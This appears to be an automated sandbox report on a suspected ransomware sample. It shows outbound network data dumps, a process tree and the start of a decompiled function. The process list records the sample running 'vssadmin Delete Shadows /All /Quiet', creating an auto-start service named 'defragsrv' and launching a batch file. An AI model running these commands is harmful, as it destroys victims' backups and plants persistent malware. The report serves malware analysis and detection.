                                                                  May 28, 2021 13:00:10.545958042 CEST2125OUTData Raw: f8 52 8f 0e eb aa c1 86 8f a9 02 0e 41 16 af c7 e9 5e fb a1 87 74 bd 9d d7 7f 99 f3 ca be 21 55 f6 96 7d be 47 a5 78 7b c4 eb e2 18 b4 45 9d 80 bf b7 bc 2b 32 f4 dd fe 8f 36 18 7d 7b fb fe 15 e4 9f 1a ff 00 e4 a2 cd ff 00 5e d1 7f 2a ed 3c 19 a4
                                                                  Data Ascii: RA^t!U}Gx{E+26}{^*<xL3#I,02O\W(_|M8S%Ok~0'SM#(\PRLG`grYA($2{;CrWzV}~o-T38nD
                                                                  May 28, 2021 13:00:10.546093941 CEST2128OUTData Raw: d9 dc 34 26 2b 3b 71 22 aa 8d bb 64 94 97 0d 1a b6 ee 0e d2 32 31 9c d6 6c 5e 21 d6 62 bf be bd fb 54 32 cd 7c e2 4b 95 9e d6 29 63 91 c1 c8 63 1b a9 5c 82 4e 08 19 19 38 eb 51 1d 67 54 36 b7 90 19 e2 26 f5 99 ae 27 36 d1 99 e4 dc 41 60 65 db bf
                                                                  Data Ascii: 4&+;q"d21l^!bT2|K)cc\N8QgT6&'6A`e@lunI#%SZZcr$ zU?C|vE$*$rg6q-_'o<w+"DyPeaST}.nZ,$8+sgi5<M
                                                                  May 28, 2021 13:00:10.546144962 CEST2139OUTData Raw: 88 46 85 f6 41 99 18 12 42 91 92 ab 8e b8 3d 2b ce c8 c8 c5 68 dc 78 83 5e bb 68 1e e7 5e d5 27 6b 77 f3 20 69 2e e4 63 13 7f 79 49 3c 1f 71 59 55 8c a4 d3 8f 4b fe 36 fc 8d 69 ca 29 34 ce aa f6 d3 4d ba d0 f4 7b e7 b7 d4 97 4e b3 d1 65 bb 16 be
                                                                  Data Ascii: FAB=+hx^h^'kw i.cyI<qYUK6i)4M{NebP<v<H|+Y/n.x,e2Hq`?xwltuG\8cRhfM'29UcwwI,i{"E,pV*5S}6\4Q[|VFXWz`
                                                                  May 28, 2021 13:00:10.611480951 CEST2147OUTData Raw: fe d4 8e c1 6d d6 67 66 b5 32 93 e5 f9 84 a9 e0 e0 f2 0b 11 d0 e0 f1 58 37 fa ec da 95 b3 8b ad 2f 4e 92 f9 d0 23 ea 1b 5c 4c e0 77 20 3f 96 5b 1c 6e d9 9e f9 cf 35 2a f8 ab 55 4d 56 f3 51 58 6c fc fb bd 46 0d 46 40 51 b6 89 22 2c 54 0f 9b ee 92
                                                                  Data Ascii: mgf2X7/N#\Lw ?[n5*UMVQXlFF@Q",T#9jKMi|'$kR;ww-m#,wuok''iaf2tRn<$)!tpMm`S>Q\5(dIcmqlu[[cZM
                                                                  May 28, 2021 13:00:10.611977100 CEST2155OUTData Raw: 2c 3a 8d 9d f4 72 26 f1 2d a9 7c 0e 48 c1 0e aa c0 f1 dc 74 22 b5 4e a9 a6 cd aa 6b 16 0d 74 63 d2 ee 6c 93 4f b5 ba 11 36 d8 c4 6e 8c 8e ca 06 ed ac c8 4b 70 4f ce 4e 09 e2 b4 62 d7 34 9b 5b 8b 78 6d f5 0b 1b 6d 45 74 a7 b7 1a cd 95 93 45 14 53
                                                                  Data Ascii: ,:r&-|Ht"NktclO6nKpONb4[xmmEtESw+acWyeni{iwo?e4:x'vUbqc;eg6im]DpyiM58M@sO4VBH872U@x7WuZhO-0Q0U}0sJZ
                                                                  May 28, 2021 13:00:10.742957115 CEST2208INData Raw: 73 61 76 65 64
                                                                  Data Ascii: saved


                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Start time:12:59:56
                                                                  Start date:28/05/2021
                                                                  Path:C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\3PSo7GcHhV.exe'
                                                                  Imagebase:0xe50000
                                                                  File size:914944 bytes
                                                                  MD5 hash:8856669B9A76EEB19E5673DB6C4491AB
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  General

                                                                  Start time:12:59:56
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff7488e0000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:12:59:56
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6b2800000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:12:59:57
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'C:\windows\system32\sc.exe' create defragsrv binpath= 'C:\Users\user\Desktop\3PSo7GcHhV.exe' start= auto
                                                                  Imagebase:0x7ff63b630000
                                                                  File size:69120 bytes
                                                                  MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:12:59:57
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6b2800000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:13:00:02
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'c:\windows\system32\cmd.exe' /c c:\windows\logg.bat
                                                                  Imagebase:0x7ff77d8b0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:13:00:02
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\vssadmin.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'c:\Windows\system32\vssadmin.exe' Delete Shadows /All /Quiet
                                                                  Imagebase:0x7ff641d80000
                                                                  File size:145920 bytes
                                                                  MD5 hash:47D51216EF45075B5F7EAA117CC70E40
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:13:00:02
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6b2800000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:13:00:02
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6b2800000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:13:00:03
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\VSSVC.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\vssvc.exe
                                                                  Imagebase:0x7ff6197e0000
                                                                  File size:1540096 bytes
                                                                  MD5 hash:C7053D974A35EAB81F153FF33C883613
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:13:00:04
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k swprv
                                                                  Imagebase:0x7ff7488e0000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:13:00:09
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'c:\windows\system32\sc.exe' create defragsrv binpath= 'C:\Users\user\Desktop\3PSo7GcHhV.exe' start= auto
                                                                  Imagebase:0x7ff63b630000
                                                                  File size:69120 bytes
                                                                  MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:13:00:09
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6b2800000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:13:00:11
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'c:\windows\system32\sc.exe' start defragsrv
                                                                  Imagebase:0x7ff63b630000
                                                                  File size:69120 bytes
                                                                  MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:13:00:12
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6b2800000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:13:00:13
                                                                  Start date:28/05/2021
                                                                  Path:C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  Imagebase:0xe50000
                                                                  File size:914944 bytes
                                                                  MD5 hash:8856669B9A76EEB19E5673DB6C4491AB
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Start time:13:00:22
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                  Imagebase:0x7ff7488e0000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Start time:13:00:23
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff7488e0000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Start time:13:00:33
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                  Imagebase:0x7ff7488e0000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Start time:13:00:34
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                  Imagebase:0x7ff7488e0000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Start time:13:00:34
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                  Imagebase:0x7ff7488e0000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Start time:13:00:35
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                  Imagebase:0x7ff7488e0000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Start time:13:00:35
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                  Imagebase:0x7ff7488e0000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Start time:13:00:36
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\SgrmBroker.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                  Imagebase:0x7ff68b920000
                                                                  File size:163336 bytes
                                                                  MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Start time:13:00:36
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                  Imagebase:0x7ff7488e0000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Start time:13:00:37
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff7488e0000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Start time:13:01:37
                                                                  Start date:28/05/2021
                                                                  Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                  Imagebase:0x7ff74ac00000
                                                                  File size:455656 bytes
                                                                  MD5 hash:A267555174BFA53844371226F482B86B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Start time:13:01:37
                                                                  Start date:28/05/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6b2800000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >

                                                                    Executed Functions

                                                                    C-Code - Quality: 84%
                                                                    			E00E63460(void* __ebx, void* __edx, void* __edi, long __esi) {
                                                                    				intOrPtr _v8;
                                                                    				struct _OVERLAPPED* _v16;
                                                                    				char _v24;
                                                                    				signed int _v32;
                                                                    				long _v36;
                                                                    				void* _v40;
                                                                    				signed int _v56;
                                                                    				void _v60;
                                                                    				void _v64;
                                                                    				struct _OVERLAPPED* _v68;
                                                                    				struct _OVERLAPPED* _v72;
                                                                    				struct _OVERLAPPED* _v76;
                                                                    				long _v80;
                                                                    				void _v84;
                                                                    				char _v88;
                                                                    				char _v92;
                                                                    				char _v96;
                                                                    				char _v100;
                                                                    				char _v104;
                                                                    				char _v108;
                                                                    				char _v112;
                                                                    				char _v116;
                                                                    				char _v120;
                                                                    				signed int _v124;
                                                                    				long _v128;
                                                                    				void* _v132;
                                                                    				intOrPtr _v136;
                                                                    				struct _OVERLAPPED* _v140;
                                                                    				struct _OVERLAPPED* _v144;
                                                                    				char _v160;
                                                                    				struct _OVERLAPPED* _v164;
                                                                    				struct _OVERLAPPED* _v168;
                                                                    				char _v184;
                                                                    				struct _OVERLAPPED* _v188;
                                                                    				struct _OVERLAPPED* _v192;
                                                                    				char _v208;
                                                                    				char _v212;
                                                                    				char _v216;
                                                                    				char _v220;
                                                                    				struct _OVERLAPPED* _v224;
                                                                    				struct _OVERLAPPED* _v228;
                                                                    				char _v244;
                                                                    				struct _OVERLAPPED* _v248;
                                                                    				struct _OVERLAPPED* _v252;
                                                                    				char _v268;
                                                                    				struct _OVERLAPPED* _v272;
                                                                    				struct _OVERLAPPED* _v276;
                                                                    				char _v292;
                                                                    				struct _OVERLAPPED* _v296;
                                                                    				struct _OVERLAPPED* _v300;
                                                                    				char _v316;
                                                                    				struct _OVERLAPPED* _v320;
                                                                    				struct _OVERLAPPED* _v324;
                                                                    				char _v340;
                                                                    				struct _OVERLAPPED* _v344;
                                                                    				struct _OVERLAPPED* _v348;
                                                                    				char _v364;
                                                                    				char _v388;
                                                                    				char _v412;
                                                                    				char _v436;
                                                                    				char _v460;
                                                                    				char _v484;
                                                                    				char _v508;
                                                                    				char _v532;
                                                                    				char _v556;
                                                                    				char _v580;
                                                                    				char _v604;
                                                                    				char _v628;
                                                                    				char _v652;
                                                                    				char _v676;
                                                                    				char _v700;
                                                                    				char _v724;
                                                                    				char _v748;
                                                                    				char _v772;
                                                                    				char _v796;
                                                                    				char _v820;
                                                                    				char _v844;
                                                                    				char _v868;
                                                                    				char _v892;
                                                                    				char _v916;
                                                                    				char _v944;
                                                                    				void* __ebp;
                                                                    				signed int _t457;
                                                                    				signed int _t458;
                                                                    				signed int _t468;
                                                                    				void* _t471;
                                                                    				WCHAR* _t474;
                                                                    				long _t475;
                                                                    				long _t483;
                                                                    				void* _t486;
                                                                    				struct _OVERLAPPED* _t488;
                                                                    				struct _OVERLAPPED* _t493;
                                                                    				struct _OVERLAPPED* _t498;
                                                                    				struct _OVERLAPPED* _t501;
                                                                    				WCHAR* _t507;
                                                                    				long _t514;
                                                                    				void* _t521;
                                                                    				void* _t524;
                                                                    				void* _t525;
                                                                    				void* _t526;
                                                                    				void* _t527;
                                                                    				void* _t528;
                                                                    				void* _t529;
                                                                    				void* _t530;
                                                                    				void* _t531;
                                                                    				void* _t532;
                                                                    				void* _t536;
                                                                    				struct _OVERLAPPED** _t544;
                                                                    				void _t546;
                                                                    				void _t548;
                                                                    				void* _t550;
                                                                    				void* _t551;
                                                                    				void* _t553;
                                                                    				void* _t554;
                                                                    				short* _t555;
                                                                    				intOrPtr* _t557;
                                                                    				void* _t564;
                                                                    				struct _OVERLAPPED** _t568;
                                                                    				signed char _t570;
                                                                    				struct _OVERLAPPED** _t575;
                                                                    				void _t577;
                                                                    				void _t579;
                                                                    				void* _t581;
                                                                    				void* _t582;
                                                                    				void* _t584;
                                                                    				void* _t585;
                                                                    				short* _t586;
                                                                    				intOrPtr* _t588;
                                                                    				void* _t595;
                                                                    				struct _OVERLAPPED** _t599;
                                                                    				signed char _t601;
                                                                    				struct _OVERLAPPED** _t606;
                                                                    				void _t608;
                                                                    				void _t610;
                                                                    				void* _t612;
                                                                    				void* _t613;
                                                                    				void* _t615;
                                                                    				void* _t616;
                                                                    				short* _t617;
                                                                    				intOrPtr* _t619;
                                                                    				void* _t626;
                                                                    				struct _OVERLAPPED** _t630;
                                                                    				signed char _t632;
                                                                    				struct _OVERLAPPED** _t637;
                                                                    				void _t639;
                                                                    				struct _OVERLAPPED** _t653;
                                                                    				void _t655;
                                                                    				struct _OVERLAPPED** _t668;
                                                                    				void _t670;
                                                                    				void* _t681;
                                                                    				void* _t711;
                                                                    				void* _t728;
                                                                    				signed int _t731;
                                                                    				void* _t732;
                                                                    				void* _t736;
                                                                    				long _t742;
                                                                    				void* _t743;
                                                                    				char* _t747;
                                                                    				long _t752;
                                                                    				signed int _t756;
                                                                    				signed int _t758;
                                                                    				char* _t760;
                                                                    				signed int* _t761;
                                                                    				signed int* _t762;
                                                                    				signed int* _t763;
                                                                    				signed int* _t764;
                                                                    				signed int* _t765;
                                                                    				signed int* _t766;
                                                                    				signed int* _t767;
                                                                    				signed int* _t768;
                                                                    				void* _t853;
                                                                    				void* _t858;
                                                                    				signed int _t885;
                                                                    				signed int _t887;
                                                                    				struct _OVERLAPPED** _t888;
                                                                    				signed int _t890;
                                                                    				signed int _t891;
                                                                    				signed int _t892;
                                                                    				struct _OVERLAPPED** _t893;
                                                                    				signed int _t895;
                                                                    				signed int _t896;
                                                                    				signed int _t897;
                                                                    				struct _OVERLAPPED** _t898;
                                                                    				signed int _t900;
                                                                    				signed int _t901;
                                                                    				signed int _t902;
                                                                    				struct _OVERLAPPED** _t903;
                                                                    				struct _OVERLAPPED** _t905;
                                                                    				struct _OVERLAPPED** _t907;
                                                                    				void* _t910;
                                                                    				long _t913;
                                                                    				signed int _t915;
                                                                    				void* _t917;
                                                                    				void* _t919;
                                                                    				void* _t922;
                                                                    				intOrPtr* _t923;
                                                                    				intOrPtr* _t925;
                                                                    				void* _t927;
                                                                    				intOrPtr* _t928;
                                                                    				intOrPtr* _t930;
                                                                    				void* _t932;
                                                                    				intOrPtr* _t933;
                                                                    				intOrPtr* _t935;
                                                                    				intOrPtr* _t936;
                                                                    				intOrPtr* _t939;
                                                                    				intOrPtr* _t942;
                                                                    				void* _t946;
                                                                    				signed int _t949;
                                                                    				void* _t952;
                                                                    				signed int _t955;
                                                                    				signed int _t956;
                                                                    
                                                                    				_t912 = __esi;
                                                                    				_t867 = __edx;
                                                                    				_push(__ebx);
                                                                    				_t736 = _t952;
                                                                    				_t955 = (_t952 - 0x00000008 & 0xfffffff8) + 4;
                                                                    				_v8 =  *((intOrPtr*)(_t736 + 4));
                                                                    				_t949 = _t955;
                                                                    				_push(0xffffffff);
                                                                    				_push(E00EC6A42);
                                                                    				_push( *[fs:0x0]);
                                                                    				_push(_t736);
                                                                    				_t956 = _t955 - 0x378;
                                                                    				_t457 =  *0xeef074; // 0xa6abe2d4
                                                                    				_t458 = _t457 ^ _t949;
                                                                    				_v32 = _t458;
                                                                    				_push(__esi);
                                                                    				_push(__edi);
                                                                    				_push(_t458);
                                                                    				 *[fs:0x0] =  &_v24;
                                                                    				_t884 = 0;
                                                                    				_v124 = 0;
                                                                    				Sleep(0x1d4c0); // executed
                                                                    				_v16 = 0;
                                                                    				_t737 =  *0xf29240; // 0x1a
                                                                    				if(0x7ffffffe - _t737 < 0xd) {
                                                                    					L173:
                                                                    					E00E59480(_t737);
                                                                    					goto L174;
                                                                    				} else {
                                                                    					asm("o16 nop [eax+eax]");
                                                                    					do {
                                                                    						_t473 =  >=  ?  *0xf29230 : 0xf29230;
                                                                    						_t474 = E00E77D30( &_v388, _t867, _v136, _t737,  >=  ?  *0xf29230 : 0xf29230, _t737, L"\\tschange.txt", 0xd);
                                                                    						_t885 = _t884 | 0x00000001;
                                                                    						_v124 = _t885;
                                                                    						if(_t474[0xa] >= 8) {
                                                                    							_t474 =  *_t474;
                                                                    						}
                                                                    						_t475 = CreateFileW(_t474, 3, 1, 0, 3, 0x80, 0); // executed
                                                                    						_t912 = _t475;
                                                                    						_t884 = _t885 & 0xfffffffe;
                                                                    						_v132 = _t912;
                                                                    						_v124 = _t884;
                                                                    						_v16 = 0xffffffff;
                                                                    						L00E59AF0(_t736,  &_v388, _t884);
                                                                    						if(_t912 != 0xffffffff && _t912 != 0) {
                                                                    							_t912 = GetFileSize(_t912, 0);
                                                                    							_v128 = _t912;
                                                                    							if(_t912 >= 1) {
                                                                    								goto L8;
                                                                    								do {
                                                                    									L10:
                                                                    									_t867 = _t913;
                                                                    									_v64 = _t867;
                                                                    									__eflags =  *((char*)(_t884 + _t867 - 1)) - 0xa;
                                                                    									if( *((char*)(_t884 + _t867 - 1)) == 0xa) {
                                                                    										_t743 = _t884 + _t742;
                                                                    										_t486 = _t913 - _t742 - 1;
                                                                    										__eflags =  *((char*)(_t884 + _t867 - 2)) - 0xd;
                                                                    										if( *((char*)(_t884 + _t867 - 2)) != 0xd) {
                                                                    											_push(_t486);
                                                                    											_v168 = 0;
                                                                    											_v164 = 0;
                                                                    											_v168 = 0;
                                                                    											_v164 = 0xf;
                                                                    											_v184 = 0;
                                                                    											L00E83CB0(_t736,  &_v184, _t743);
                                                                    											_v16 = 3;
                                                                    											_t488 = _v72;
                                                                    											__eflags = _t488 - _v68;
                                                                    											if(_t488 == _v68) {
                                                                    												E00E75590(_t736,  &_v76, _t884, _t913, _t488,  &_v184);
                                                                    											} else {
                                                                    												asm("movups xmm0, [ebp-0xac]");
                                                                    												 *(_t488 + 0x10) = 0;
                                                                    												_v184 = 0;
                                                                    												asm("movups [eax], xmm0");
                                                                    												asm("movq xmm0, [ebp-0x9c]");
                                                                    												asm("movq [eax+0x10], xmm0");
                                                                    												_v72 = _v72 + 0x18;
                                                                    												_v168 = 0;
                                                                    												_v164 = 0xf;
                                                                    											}
                                                                    											_v16 = 1;
                                                                    											_t747 =  &_v184;
                                                                    										} else {
                                                                    											_v144 = 0;
                                                                    											_push(_t486 - 1);
                                                                    											_v140 = 0;
                                                                    											_v144 = 0;
                                                                    											_v140 = 0xf;
                                                                    											_v160 = 0;
                                                                    											L00E83CB0(_t736,  &_v160, _t743);
                                                                    											_v16 = 2;
                                                                    											_t493 = _v72;
                                                                    											__eflags = _t493 - _v68;
                                                                    											if(_t493 == _v68) {
                                                                    												E00E75590(_t736,  &_v76, _t884, _t913, _t493,  &_v160);
                                                                    												_v16 = 1;
                                                                    												_t747 =  &_v160;
                                                                    											} else {
                                                                    												asm("movups xmm0, [ebp-0x94]");
                                                                    												 *(_t493 + 0x10) = 0;
                                                                    												_v160 = 0;
                                                                    												asm("movups [eax], xmm0");
                                                                    												asm("movq xmm0, [ebp-0x84]");
                                                                    												asm("movq [eax+0x10], xmm0");
                                                                    												_v72 = _v72 + 0x18;
                                                                    												_v144 = 0;
                                                                    												_v140 = 0xf;
                                                                    												_v16 = 1;
                                                                    												_t747 =  &_v160;
                                                                    											}
                                                                    										}
                                                                    										L00E83B80(_t736, _t747, _t884);
                                                                    										_t867 = _v64;
                                                                    										_t742 = _t913;
                                                                    										_t483 = _v128;
                                                                    									}
                                                                    									_t913 = _t913 + 1;
                                                                    									__eflags = _t867 - _t483;
                                                                    								} while (_t867 < _t483);
                                                                    								_v192 = 0;
                                                                    								_push(_t483 - _t742);
                                                                    								_v188 = 0;
                                                                    								_v192 = 0;
                                                                    								_v188 = 0xf;
                                                                    								_v208 = 0;
                                                                    								L00E83CB0(_t736,  &_v208, _t884 + _t742);
                                                                    								_v16 = 4;
                                                                    								_t498 = _v72;
                                                                    								__eflags = _t498 - _v68;
                                                                    								if(_t498 == _v68) {
